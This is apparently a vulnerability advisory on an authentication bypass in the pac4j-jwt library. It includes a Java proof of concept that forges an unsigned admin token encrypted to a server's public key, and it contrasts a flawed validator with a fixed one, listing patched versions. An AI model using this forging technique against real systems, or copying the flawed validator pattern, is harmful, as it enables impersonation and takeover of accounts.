Critical Authentication Bypass Flaw in pac4j-jwt Exposes Systems to Full Takeover
A severe vulnerability in the widely used Java authentication library pac4j-jwt, the JWT module of the pac4j security framework (CVE-2026-29000), allows attackers to bypass authentication entirely and impersonate any user, including administrators, with minimal effort. The flaw, rated CVSS 10.0, was discovered by the CodeAnt AI Security Research Team during an investigation into open-source code patches.
How the Exploit Works
The vulnerability stems from a critical oversight in how the library handles unsigned JSON Web Tokens (JWTs). A pac4j-jwt deployment can apply two layers to a token: encryption (JWE) to protect the token's contents, and a cryptographic signature (JWS) to prove who issued it. The researchers found that if an attacker crafts an unsigned token (a PlainJWT, whose header carries alg "none") and encrypts it with the server's public RSA encryption key, the library decrypts it but never requires a signature on the inner token.
Because of a misplaced null check in the validation code, the signature verification step is skipped entirely when no signature is present: verification only runs once a signed token has been found, so an unsigned one is never rejected. Instead of discarding the token, the library processes its unverified claims, letting an attacker forge any identity, such as an administrator account, without holding the signing key or any credentials.
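As an added illustration of the flow described above (example code, not pac4j's own source and not the patch), the following Java program uses the nimbus-jose-jwt library that pac4j-jwt builds on. The attacker side wraps an unsigned PlainJWT in a JWE encrypted to the server's public RSA key, and two validator shapes then process it: one whose verification step is conditioned on a signature being present, the pattern the "misplaced null check" describes, and one that rejects any inner token that is not signed. The class name, method names and claim values are this example's own, the key pairs are generated locally to stand in for the server's encryption and signature configurations, and nimbus-jose-jwt is assumed to be on the classpath; the code does not reproduce pac4j's actual code paths.

```java
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.*;
import com.nimbusds.jwt.*;

import java.security.*;
import java.security.interfaces.*;
import java.text.ParseException;

// Added example, not pac4j code: models the nested-JWT check described above
// with the nimbus-jose-jwt primitives that pac4j-jwt builds on.
public class NestedPlainJwtDemo {

    // Attacker side. Needs only the server's public RSA encryption key:
    // no signing key, no credentials.
    static String forgeToken(RSAPublicKey serverEncryptionKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")                  // constructed identity of the attacker's choosing
                .claim("roles", "ROLE_ADMIN")
                .build();
        PlainJWT unsigned = new PlainJWT(claims);  // header {"alg":"none"}, empty signature part

        JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                .contentType("JWT")                // marks the payload as a nested JWT
                .build();
        JWEObject jwe = new JWEObject(header, new Payload(unsigned.serialize()));
        jwe.encrypt(new RSAEncrypter(serverEncryptionKey));
        return jwe.serialize();
    }

    // Server side, shared step: decrypt an encrypted token and return the JWT it carried.
    static JWT unwrap(String token, RSAPrivateKey decryptionKey) throws ParseException, JOSEException {
        JWT jwt = JWTParser.parse(token);
        if (jwt instanceof EncryptedJWT) {
            EncryptedJWT encrypted = (EncryptedJWT) jwt;
            encrypted.decrypt(new RSADecrypter(decryptionKey));
            return JWTParser.parse(encrypted.getPayload().toString()); // SignedJWT or PlainJWT
        }
        return jwt;
    }

    // Vulnerable shape: the signature is verified only when one is present, so a
    // PlainJWT leaves `signed` null and the claims are returned unverified.
    static JWTClaimsSet validateVulnerable(String token, RSAPrivateKey decryptionKey,
                                           RSAPublicKey signingKey) throws ParseException, JOSEException {
        JWT inner = unwrap(token, decryptionKey);
        SignedJWT signed = (inner instanceof SignedJWT) ? (SignedJWT) inner : null;
        if (signed != null && !signed.verify(new RSASSAVerifier(signingKey))) {
            throw new SecurityException("invalid signature");
        }
        return inner.getJWTClaimsSet(); // reached for an unsigned token with nothing verified
    }

    // Fixed shape: anything that is not a signed JWT is rejected before claims are read.
    static JWTClaimsSet validateFixed(String token, RSAPrivateKey decryptionKey,
                                      RSAPublicKey signingKey) throws ParseException, JOSEException {
        JWT inner = unwrap(token, decryptionKey);
        if (!(inner instanceof SignedJWT)) {
            throw new SecurityException("unsigned token rejected");
        }
        SignedJWT signed = (SignedJWT) inner;
        if (!signed.verify(new RSASSAVerifier(signingKey))) {
            throw new SecurityException("invalid signature");
        }
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair encryptionPair = kpg.generateKeyPair(); // stands in for the server's RSA encryption configuration
        KeyPair signingPair = kpg.generateKeyPair();    // stands in for its RSA signature configuration
        RSAPrivateKey decryptionKey = (RSAPrivateKey) encryptionPair.getPrivate();
        RSAPublicKey signingKey = (RSAPublicKey) signingPair.getPublic();

        String forged = forgeToken((RSAPublicKey) encryptionPair.getPublic());

        JWTClaimsSet accepted = validateVulnerable(forged, decryptionKey, signingKey);
        System.out.println("vulnerable validator accepted subject: " + accepted.getSubject());

        try {
            validateFixed(forged, decryptionKey, signingKey);
            System.out.println("fixed validator accepted the token (unexpected)");
        } catch (SecurityException e) {
            System.out.println("fixed validator rejected it: " + e.getMessage());
        }
    }
}
```

Run with nimbus-jose-jwt on the classpath: the vulnerable validator prints the forged subject, the fixed one throws. The point to carry into a code review is that a decrypted JWE payload is still untrusted input, because anyone holding the public encryption key can produce something the server will decrypt; the validator must require a SignedJWT and a successful verify before it reads a single claim.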
Affected Systems & Patching
The flaw affects deployments in which JwtAuthenticator is configured with an RSA encryption configuration, that is, deployments that accept RSA-encrypted tokens. The open-source community responded swiftly: maintainer Jérôme Leleu released patches within two business days of disclosure. Users must upgrade to the following fixed versions:
- 4.x branch: 4.5.9 or newer
- 5.x branch: 5.7.9 or newer
- 6.x branch: 6.3.3 or newer
Security teams can verify exposure by checking their dependency manifests and lock files for pac4j-jwt versions below those listed above, and by scanning application code for JwtAuthenticator instances configured with both an encryption configuration and a signature configuration.
The discovery underscores the risks of improper token validation in authentication frameworks, particularly when public-key cryptography is involved: a public encryption key lets anyone produce a token the server will decrypt, so successful decryption alone proves nothing about who issued the token.
CodeAnt AI cybersecurity rating report: https://www.rankiteo.com/company/codeant-ai
{
  "id": "COD1772714088",
  "linkid": "codeant-ai",
  "type": "Vulnerability",
  "date": "3/2026",
  "severity": "100",
  "impact": "5",
  "explanation": "Attack threatening the organization's existence"
}

{
  "affected_entities": [
    {
      "customers_affected": "Users of pac4j-jwt with vulnerable configurations",
      "industry": "Technology/Authentication",
      "type": "Software Library"
    }
  ],
  "attack_vector": "Remote Exploitation",
  "data_breach": {
    "data_encryption": "RSA-encrypted tokens (exploited in attack)"
  },
  "description": "A severe vulnerability in the widely used Java authentication library pac4j-jwt (CVE-2026-29000) allows attackers to bypass authentication entirely and impersonate any user, including administrators, with minimal effort. The flaw stems from a critical oversight in how the library handles unsigned JSON Web Tokens (JWTs). Attackers can craft an unsigned token (PlainJWT), encrypt it using the server’s public RSA key, and bypass signature verification due to a misplaced null check in the code.",
  "impact": {
    "identity_theft_risk": "High (arbitrary user impersonation)",
    "operational_impact": "Full system takeover, administrative access impersonation",
    "systems_affected": "Systems using pac4j-jwt with RSA-encrypted tokens and JwtAuthenticator configuration"
  },
  "investigation_status": "Vulnerability patched",
  "lessons_learned": "Risks of improper token validation in authentication frameworks, particularly with public-key cryptography",
  "post_incident_analysis": {
    "corrective_actions": "Code fix to enforce signature validation, release of patched versions",
    "root_causes": "Misplaced null check in signature verification, improper handling of unsigned JWTs"
  },
  "recommendations": "Upgrade to patched versions, verify package managers for vulnerable versions, scan application code for vulnerable configurations",
  "references": [
    { "source": "CodeAnt AI Security Research Team" }
  ],
  "response": {
    "containment_measures": "Upgrade to patched versions (4.5.9+, 5.7.9+, 6.3.3+)",
    "remediation_measures": "Patch deployment, code scanning for vulnerable configurations"
  },
  "title": "Critical Authentication Bypass Flaw in pac4j-jwt Exposes Systems to Full Takeover",
  "type": "Authentication Bypass",
  "vulnerability_exploited": "CVE-2026-29000"
}